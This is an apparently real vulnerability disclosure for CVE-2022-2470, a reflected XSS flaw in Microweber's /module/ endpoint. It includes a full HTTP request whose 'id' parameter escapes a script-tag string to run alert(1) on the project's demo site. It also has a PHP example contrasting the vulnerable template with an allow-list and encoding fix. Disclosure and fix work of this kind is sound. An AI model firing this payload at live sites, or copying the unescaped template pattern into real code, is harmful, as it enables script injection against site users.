Headline
CVE-2022-2470: Cross-site Scripting (XSS) - Reflected in microweber
Cross-site Scripting (XSS) - Reflected in GitHub repository microweber/microweber prior to 1.2.21.
Description
Hi team, I found XSS at /module/.
Proof of Concept
Pop up POC:
Reflected POC:
Full request payload:
POST /demo/module/ HTTP/1.1
Host: demo.microweber.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 183
Origin: https://demo.microweber.org
Referer: https://demo.microweber.org/demo/shop
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Te: trailers
Connection: close

type=shop%2Fcheckout&template=modal&id=js-ajax-cart');});function%20$(num1){alert(1);return%20String(num1)}$(document).ready(function%20()%20{mw.$('-checkout-process&class=no-settings
Impact
XSS
Occurrences
index.php L80-L92
This function does not filter the ‘id’ parameter inside a script tag, which allows attackers to escape the syntax using an apostrophe.
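An added illustration of the flaw described above and one way to close it; it is not microweber's code and not the 1.2.21 patch. The template in `render_vulnerable`, the `render_hardened` function, the allow-list pattern and the valid sample id are assumptions made for the example; the request body is the one from the report.

```php
<?php
declare(strict_types=1);

// Request body copied from the report above; parse_str() URL-decodes it.
$body = <<<'BODY'
type=shop%2Fcheckout&template=modal&id=js-ajax-cart');});function%20$(num1){alert(1);return%20String(num1)}$(document).ready(function%20()%20{mw.$('-checkout-process&class=no-settings
BODY;
parse_str($body, $params);
$reportedId = $params['id'];

// Hypothetical stand-in for the affected template: the raw id lands inside
// a single-quoted JavaScript string, so an apostrophe ends that string.
function render_vulnerable(string $id): string
{
    return '<script>$(document).ready(function () { mw.$(\'#' . $id . '\').show(); });</script>';
}

// Assumption: legitimate module ids need only letters, digits, "_" and "-".
const ID_PATTERN = '/\A[A-Za-z0-9_-]{1,64}\z/';
// The HEX flags turn < > & ' " into \uXXXX escapes, so the value can end
// neither the string literal nor the surrounding <script> element.
const JS_FLAGS = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR;

function render_hardened(string $id): ?string
{
    if (preg_match(ID_PATTERN, $id) !== 1) {
        return null; // refuse to reflect anything outside the allow-list
    }
    $selector = json_encode('#' . $id, JS_FLAGS); // includes its own quotes
    return '<script>$(document).ready(function () { mw.$(' . $selector . ').show(); });</script>';
}

// Compare the three treatments of the reported id, then a constructed valid id.
echo "vulnerable:   ", render_vulnerable($reportedId), "\n";
echo "encoded only: ", json_encode($reportedId, JS_FLAGS), "\n";
echo "hardened:     ", var_export(render_hardened($reportedId), true), "\n";
echo "valid id:     ", render_hardened('js-ajax-cart-checkout-process'), "\n";
```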
Related news
GHSA-cfcg-2qgr-v243: Microweber before 1.2.21 vulnerable to reflected XSS
Microweber prior to 1.2.21 is vulnerable to reflected cross-site scripting (XSS).